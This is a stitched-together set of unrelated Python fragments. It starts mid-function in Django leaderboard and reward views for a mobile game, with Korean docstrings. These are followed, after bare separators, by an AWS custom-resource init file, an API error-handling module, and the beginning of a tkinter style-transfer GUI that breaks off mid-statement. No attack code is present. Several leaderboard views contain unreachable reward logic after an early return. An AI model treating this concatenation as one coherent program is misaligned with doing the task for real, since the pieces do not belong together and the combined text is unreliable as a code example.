            data['Score'] = rankData.Score
            data['Rank'] = cnt
            if len(userData) > 0:
                data['UserName'] = myUtil.encodeStr(userData[0].UserName)
                data['PictureURL'] = userData[0].PictureURL
            friendRankList.append(data)
            if rankData.Score > 0:
                # Reward handling: only ranks 1-3 owned by the requester earn one.
                if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo1Reward.objects.all())
                elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo2Reward.objects.all())
                elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo3Reward.objects.all())
                else:
                    # NOTE(review): this reset fires on every non-matching row,
                    # so a previously assigned RewardList can be wiped by a
                    # later friend's row before it is consumed below -- confirm
                    # whether that is intended.
                    RewardList = []
                # NOTE(review): the rank counter only advances for rows with a
                # positive score -- zero-score rows share the current rank.
                cnt = cnt + 1
    # Pay out (and echo back) whatever rewards the requester earned.
    for reward in RewardList:
        data = {}
        if reward.Type == 1:
            # Type 1: gold.
            UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
            if len(UserList) > 0:
                money = UserList[0]
                money.GoldValue = money.GoldValue + reward.Value
                money.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        elif reward.Type == 2:
            # Type 2: cash.
            UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
            if len(UserList) > 0:
                money = UserList[0]
                money.CashValue = money.CashValue + reward.Value
                money.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        elif reward.Type == 3:
            # Type 3: item -- increment an existing stack or create one.
            myItem = list(ItemData.objects.filter(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN))
            if len(myItem) > 0:
                myItem[0].Value = myItem[0].Value + reward.Value
                myItem[0].save()
            else:
                itemdata = ItemData(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN, Value = reward.Value)
                itemdata.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        RewardData.append(data)
    SendData['RankData'] = friendRankList
    SendData['RewardData'] = RewardData
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 친구 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
MyRank = 내랭킹
RewardData
- Type = 1 : 골드, 2 : 캐쉬, 3 : 아이템.
- ItemSN = 아이템SN.
- Value = 수량.
RankData
- UserSN = 유저 번호.
- Rank = 랭킹.
- Score = 점수.
- UserName = 유저 이름.
- PictureURL = 사진URL.
"""
@csrf_exempt
def FriendTimeAttackLastWeekRankResponse(request):
    """Last week's time-attack friend ranking, with one-time reward payout.

    POST params: SN (user serial number), Auth (authentication token).
    Returns MyRank, RewardData (Type 1=gold, 2=cash, 3=item; ItemSN; Value)
    and RankData rows -- or an empty body once the result was already viewed.
    """
    # Argument validation.
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # Result handling.
    # Has the ranking already been confirmed (viewed)?
    confirmData = list(TimeAttackFriendLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    # Mark as confirmed immediately so the reward is paid out only once.
    confirmData[0].Confirm = True
    confirmData[0].save()
    friendList = []
    friendRankList = []
    SendData = {}
    RewardData = []
    RewardList = []
    for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
        friendList.append(friendData.FriendSN)
    cnt = 1
    # Walk the full last-week table, keeping only friends and the requester.
    for rankData in list(TimeAttackFriendLastWeekRankData.objects.order_by('-Score')):
        if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
            userData = list(UserData.objects.filter(id = rankData.UserSN))
            data = {}
            data['UserSN'] = rankData.UserSN
            data['Score'] = rankData.Score
            data['Rank'] = cnt
            if len(userData) > 0:
                data['UserName'] = myUtil.encodeStr(userData[0].UserName)
                data['PictureURL'] = userData[0].PictureURL
            friendRankList.append(data)
            if rankData.Score > 0:
                # Reward handling: only ranks 1-3 owned by the requester earn one.
                if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo1Reward.objects.all())
                elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo2Reward.objects.all())
                elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                    SendData['MyRank'] = cnt
                    RewardList = list(FriendRankNo3Reward.objects.all())
                else:
                    # NOTE(review): this reset fires on every non-matching row,
                    # so a previously assigned RewardList can be wiped by a
                    # later friend's row before it is consumed below -- confirm
                    # whether that is intended.
                    RewardList = []
                # NOTE(review): the rank counter only advances for rows with a
                # positive score -- zero-score rows share the current rank.
                cnt = cnt + 1
    # Pay out (and echo back) whatever rewards the requester earned.
    for reward in RewardList:
        data = {}
        if reward.Type == 1:
            # Type 1: gold.
            UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
            if len(UserList) > 0:
                money = UserList[0]
                money.GoldValue = money.GoldValue + reward.Value
                money.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        elif reward.Type == 2:
            # Type 2: cash.
            UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
            if len(UserList) > 0:
                money = UserList[0]
                money.CashValue = money.CashValue + reward.Value
                money.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        elif reward.Type == 3:
            # Type 3: item -- increment an existing stack or create one.
            myItem = list(ItemData.objects.filter(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN))
            if len(myItem) > 0:
                myItem[0].Value = myItem[0].Value + reward.Value
                myItem[0].save()
            else:
                itemdata = ItemData(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN, Value = reward.Value)
                itemdata.save()
            data['Type'] = reward.Type
            data['ItemSN'] = reward.ItemSN
            data['Value'] = reward.Value
        RewardData.append(data)
    SendData['RankData'] = friendRankList
    SendData['RewardData'] = RewardData
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
SendData['MyRank'] = 내랭크.
SendData['MyReward'] = 보상 값.
RankData
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL']
"""
@csrf_exempt
def InfiniteLastWeekRankResponse(request):
    """Infinite-mode last-week ranking endpoint.

    POST params:
        SN   -- user serial number.
        Auth -- authentication token.
    Returns JSON; on validation failure an {ErrorCode, Message} object.
    """
    # --- argument validation ---------------------------------------
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # --- result handling -------------------------------------------
    # Rank confirmation: answer only the first time the user checks last
    # week's result, then mark the entry as confirmed.
    confirmData = list(InfiniteLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    confirmData[0].Confirm = True
    confirmData[0].save()
    data = {
        'IsReward' : False,
        'RewardValue' : 0,
    }
    return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # NOTE(review): everything below is unreachable -- the function always
    # returns above.  Kept for now; confirm whether the ranking/reward flow
    # was meant to replace the early return before deleting it.
    RankList = []
    SendData = {}
    cnt = 1
    for rankData in list(InfiniteLastWeekRankData.objects.order_by('-Score')):
        userData = list(UserData.objects.filter(id = rankData.UserSN))
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Score'] = rankData.Score
        data['Rank'] = cnt
        if len(userData) > 0:
            data['UserName'] = myUtil.encodeStr(userData[0].UserName)
            data['PictureURL'] = userData[0].PictureURL
        RankList.append(data)
        if rankData.Score > 0:
            # Reward handling for the calling user's top-3 placement.
            # BUGFIX: POST values are strings -- compare as int (the friend
            # ranking handler above already does), otherwise equality with
            # the integer UserSN could never succeed.
            if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    # BUGFIX: the instance was bound to the name 'MoneyData',
                    # shadowing the model class and making the filter() call
                    # above raise UnboundLocalError.
                    money = UserList[0]
                    money.CashValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 1
                SendData['MyReward'] = 5
            elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    money = UserList[0]
                    money.GoldValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 2
                SendData['MyReward'] = 5
            elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
                itemdata.save()
                SendData['MyRank'] = 3
                SendData['MyReward'] = 1
        cnt = cnt + 1
    SendData['RankData'] = RankList
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def TimeAttackLastWeekRankResponse(request):
    """Time-attack last-week ranking endpoint.

    POST params:
        SN   -- user serial number.
        Auth -- authentication token.
    Returns JSON; on validation failure an {ErrorCode, Message} object.
    """
    # --- argument validation ---------------------------------------
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # --- result handling -------------------------------------------
    # Rank confirmation: answer only the first time the user checks last
    # week's result, then mark the entry as confirmed.
    confirmData = list(TimeAttackLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    confirmData[0].Confirm = True
    confirmData[0].save()
    data = {
        'IsReward' : False,
        'RewardValue' : 0,
    }
    return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # NOTE(review): everything below is unreachable -- the function always
    # returns above.  Kept for now; confirm whether the ranking/reward flow
    # was meant to replace the early return before deleting it.
    RankList = []
    SendData = {}
    cnt = 1
    for rankData in list(TimeAttackLastWeekRankData.objects.order_by('-Score')):
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Score'] = rankData.Score
        data['Rank'] = cnt
        RankList.append(data)
        if rankData.Score > 0:
            # Reward handling for the calling user's top-3 placement.
            # BUGFIX: POST values are strings -- compare as int (the friend
            # ranking handler above already does), otherwise equality with
            # the integer UserSN could never succeed.
            if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    # BUGFIX: the instance was bound to the name 'MoneyData',
                    # shadowing the model class and making the filter() call
                    # above raise UnboundLocalError.
                    money = UserList[0]
                    money.CashValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 1
                SendData['MyReward'] = 5
            elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    money = UserList[0]
                    money.GoldValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 2
                SendData['MyReward'] = 5
            elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
                itemdata.save()
                SendData['MyRank'] = 3
                SendData['MyReward'] = 1
        cnt = cnt + 1
    SendData['RankData'] = RankList
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 전월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def InfiniteLastMonthRankResponse(request):
    """Infinite-mode last-month ranking endpoint.

    POST params:
        SN   -- user serial number.
        Auth -- authentication token.
    Returns JSON; on validation failure an {ErrorCode, Message} object.
    """
    # --- argument validation ---------------------------------------
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # --- result handling -------------------------------------------
    # Rank confirmation: answer only the first time the user checks last
    # month's result, then mark the entry as confirmed.
    confirmData = list(InfiniteLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
    # BUGFIX: the old condition (len > 0 and Confirm) fell through to
    # confirmData[0] below and raised IndexError for users without a
    # last-month entry.  Bail out on empty, matching the weekly handlers.
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    confirmData[0].Confirm = True
    confirmData[0].save()
    data = {
        'IsReward' : False,
        'RewardValue' : 0,
    }
    return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # NOTE(review): everything below is unreachable -- the function always
    # returns above.  Kept for now; confirm whether the ranking/reward flow
    # was meant to replace the early return before deleting it.
    RankList = []
    SendData = {}
    cnt = 1
    for rankData in list(InfiniteLastMonthRankData.objects.order_by('-Score')):
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Score'] = rankData.Score
        data['Rank'] = cnt
        RankList.append(data)
        if rankData.Score > 0:
            # Reward handling for the calling user's top-3 placement.
            # BUGFIX: POST values are strings -- compare as int (the friend
            # ranking handler above already does), otherwise equality with
            # the integer UserSN could never succeed.
            if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    # BUGFIX: the instance was bound to the name 'MoneyData',
                    # shadowing the model class and making the filter() call
                    # above raise UnboundLocalError.
                    money = UserList[0]
                    money.CashValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 1
                SendData['MyReward'] = 5
            elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    money = UserList[0]
                    money.GoldValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 2
                SendData['MyReward'] = 5
            elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
                itemdata.save()
                SendData['MyRank'] = 3
                SendData['MyReward'] = 1
        cnt = cnt + 1
    SendData['RankData'] = RankList
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 전월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def TimeAttackLastMonthRankResponse(request):
    """Time-attack last-month ranking endpoint.

    POST params:
        SN   -- user serial number.
        Auth -- authentication token.
    Returns JSON; on validation failure an {ErrorCode, Message} object.
    """
    # --- argument validation ---------------------------------------
    if request.method == 'GET':
        data = {
            'ErrorCode' : '99',
            'Message' : 'error',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    if not request.POST.get('SN'):
        data = {
            'ErrorCode' : '101',
            'Message' : 'SN does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    elif not request.POST.get('Auth'):
        data = {
            'ErrorCode' : '102',
            'Message' : 'Auth does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(user) == 0:
        data = {
            'ErrorCode' : '103',
            'Message' : 'UserData does not exist',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    user = user[0]
    if user.Auth != request.POST.get('Auth'):
        data = {
            'ErrorCode' : '104',
            'Message' : 'Auth is invalid.',
        }
        return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # --- result handling -------------------------------------------
    # Rank confirmation: answer only the first time the user checks last
    # month's result, then mark the entry as confirmed.
    confirmData = list(TimeAttackLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
    # BUGFIX: the old condition (len > 0 and Confirm) fell through to
    # confirmData[0] below and raised IndexError for users without a
    # last-month entry.  Bail out on empty, matching the weekly handlers.
    if len(confirmData) == 0 or confirmData[0].Confirm == True:
        return HttpResponse('', content_type='application/json')
    confirmData[0].Confirm = True
    confirmData[0].save()
    data = {
        'IsReward' : False,
        'RewardValue' : 0,
    }
    return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
    # NOTE(review): everything below is unreachable -- the function always
    # returns above.  Kept for now; confirm whether the ranking/reward flow
    # was meant to replace the early return before deleting it.
    RankList = []
    SendData = {}
    cnt = 1
    for rankData in list(TimeAttackLastMonthRankData.objects.order_by('-Score')):
        data = {}
        data['UserSN'] = rankData.UserSN
        data['Score'] = rankData.Score
        data['Rank'] = cnt
        RankList.append(data)
        if rankData.Score > 0:
            # Reward handling for the calling user's top-3 placement.
            # BUGFIX: POST values are strings -- compare as int (the friend
            # ranking handler above already does), otherwise equality with
            # the integer UserSN could never succeed.
            if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    # BUGFIX: the instance was bound to the name 'MoneyData',
                    # shadowing the model class and making the filter() call
                    # above raise UnboundLocalError.
                    money = UserList[0]
                    money.CashValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 1
                SendData['MyReward'] = 5
            elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
                UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
                if len(UserList) > 0:
                    money = UserList[0]
                    money.GoldValue = 5  # NOTE(review): assigns, not adds -- confirm intent
                    money.save()
                SendData['MyRank'] = 2
                SendData['MyReward'] = 5
            elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
                itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
                itemdata.save()
                SendData['MyRank'] = 3
                SendData['MyReward'] = 1
        cnt = cnt + 1
    SendData['RankData'] = RankList
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 랭킹 초기화 시간 가져오기.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
SendData['Week'] = 주간랭킹 남은초.
SendData['Month'] = 월간랭킹 남은초.
SendData['Friend'] = 친구 주간랭킹 남은초.
"""
@csrf_exempt
def InitRankTimeResponse(request):
    """Return the seconds remaining until each ranking board resets.

    POST params: SN (user serial), Auth (token).
    Response JSON keys: Week, Month, Friend -- remaining seconds each.
    """
    # Reject plain GET requests.
    if request.method == 'GET':
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '99', 'Message' : 'error'}),
            content_type='application/json')
    # Required POST parameters.
    if not request.POST.get('SN'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '101', 'Message' : 'SN does not exist'}),
            content_type='application/json')
    elif not request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '102', 'Message' : 'Auth does not exist'}),
            content_type='application/json')
    # Look up the caller and verify the token.
    users = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(users) == 0:
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '103', 'Message' : 'UserData does not exist'}),
            content_type='application/json')
    if users[0].Auth != request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '104', 'Message' : 'Auth is invalid.'}),
            content_type='application/json')
    # Remaining seconds for the weekly / monthly / friend boards.
    rankInfo = list(RankInfoData.objects.all())[0]
    SendData = {
        'Week'   : myUtil.ToSecRemaining(rankInfo.WeekInitTime),
        'Month'  : myUtil.ToSecRemaining(rankInfo.MonthInitTime),
        'Friend' : myUtil.ToSecRemaining(rankInfo.FriendInitTime),
    }
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 치킨 주간랭킹 초기화 여부.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
Confirm = 주간랭킹 확인여부.
"""
@csrf_exempt
def IsChickenLastWeekRank(request):
    """Report whether the user has already viewed last week's rankings.

    'Confirm' is False as soon as either weekly board still holds an
    unconfirmed entry for this user.
    """
    # Reject plain GET requests.
    if request.method == 'GET':
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '99', 'Message' : 'error'}),
            content_type='application/json')
    # Required POST parameters.
    if not request.POST.get('SN'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '101', 'Message' : 'SN does not exist'}),
            content_type='application/json')
    elif not request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '102', 'Message' : 'Auth does not exist'}),
            content_type='application/json')
    # Look up the caller and verify the token.
    users = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(users) == 0:
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '103', 'Message' : 'UserData does not exist'}),
            content_type='application/json')
    if users[0].Auth != request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '104', 'Message' : 'Auth is invalid.'}),
            content_type='application/json')
    # Check both weekly boards for an unconfirmed entry.
    SendData = {'Confirm' : True}
    for RankModel in (InfiniteLastWeekRankData, TimeAttackLastWeekRankData):
        rows = list(RankModel.objects.filter(UserSN = request.POST.get('SN')))
        if len(rows) > 0 and rows[0].Confirm == False:
            SendData['Confirm'] = False
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 치킨 월간랭킹 초기화 여부.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
Confirm = 월간랭킹 확인여부.
"""
@csrf_exempt
def IsChickenLastMonthRank(request):
    """Report whether the user has already viewed last month's rankings.

    'Confirm' is False as soon as either monthly board still holds an
    unconfirmed entry for this user.
    """
    # Reject plain GET requests.
    if request.method == 'GET':
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '99', 'Message' : 'error'}),
            content_type='application/json')
    # Required POST parameters.
    if not request.POST.get('SN'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '101', 'Message' : 'SN does not exist'}),
            content_type='application/json')
    elif not request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '102', 'Message' : 'Auth does not exist'}),
            content_type='application/json')
    # Look up the caller and verify the token.
    users = list(UserData.objects.filter(id = request.POST.get('SN')))
    if len(users) == 0:
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '103', 'Message' : 'UserData does not exist'}),
            content_type='application/json')
    if users[0].Auth != request.POST.get('Auth'):
        return HttpResponse(
            myUtil.JsonPaser({'ErrorCode' : '104', 'Message' : 'Auth is invalid.'}),
            content_type='application/json')
    # Check both monthly boards for an unconfirmed entry.
    SendData = {'Confirm' : True}
    for RankModel in (InfiniteLastMonthRankData, TimeAttackLastMonthRankData):
        rows = list(RankModel.objects.filter(UserSN = request.POST.get('SN')))
        if len(rows) > 0 and rows[0].Confirm == False:
            SendData['Confirm'] = False
    return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
"""Resource Name CloudFormation Custom Resource"""
from . import lambda_function
__all__ = ["lambda_function"]
|
# Exception handling for SmtApi: translate an HTTP error response into a
# typed exception instance and raise it.
def handle_error_response(resp):
    """Translate an HTTP error response into an SmtApiError and raise it.

    Parameters:
        resp -- an HTTP response object whose .json() payload may carry an
                'error' object with errorMessage / errorCode / errorKey.
    Raises:
        The SmtApiError subclass mapped from the response's errorCode,
        built with as much data as the API response provides.
    """
    # Mapping of API response codes to exception classes.
    codes = {
        -1: SmtApiError,
        '400': BadRequest,
        '401': AuthFail,
        '403': HeaderMissing,
        '500': GenericError,
    }
    error = resp.json().get('error', {})
    message = error.get('errorMessage')
    code = error.get('errorCode', -1)
    data = error.get('errorKey', {})
    # BUGFIX: an unrecognised code previously raised a bare KeyError from
    # the dict lookup; fall back to the base SmtApiError instead.
    raise codes.get(code, SmtApiError)(message=message, code=code, data=data, response=resp)


class SmtApiError(Exception):
    """Base SmtApi error carrying the offending response and API details."""
    # Class-level defaults, overridden per instance when the API supplies them.
    response = None
    data = {}
    code = -1
    message = "An unknown error occurred"

    def __init__(self, message=None, code=None, data=None, response=None):
        # BUGFIX: 'data' used a mutable default argument ({}); use None as
        # the sentinel so call sites can never share a dict instance.
        self.response = response
        if message:
            self.message = message
        if code:
            self.code = code
        if data:
            self.data = data

    def __str__(self):
        # Prefix the message with the code when one is set (default -1 is truthy).
        if self.code:
            return '{}: {}'.format(self.code, self.message)
        return self.message


# Specific exception classes, one per handled HTTP status code.
class BadRequest(SmtApiError):
    pass


class AuthFail(SmtApiError):
    pass


class HeaderMissing(SmtApiError):
    pass


class GenericError(SmtApiError):
    pass
from tkinter import filedialog
from tkinter import *
from PIL import Image
import os
# Default style / content images and output directory; overridden at runtime
# by the file-dialog buttons.  NOTE(review): machine-specific absolute paths.
s_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\van_gogh.png'
c_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\tiger.png'
output_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\outputs'
def run():
    """Assemble and execute the stylize.py command for the current selections."""
    # Slider stores a percentage; stylize.py expects a 0..1 fraction.
    alpha = str(alpha_scale.get()/100)
    command = ('python stylize.py --checkpoints models/relu5_1 models/relu4_1 '
               'models/relu3_1 models/relu2_1 models/relu1_1 --relu-targets '
               'relu5_1 relu4_1 relu3_1 relu2_1 relu1_1 --style-size 512 '
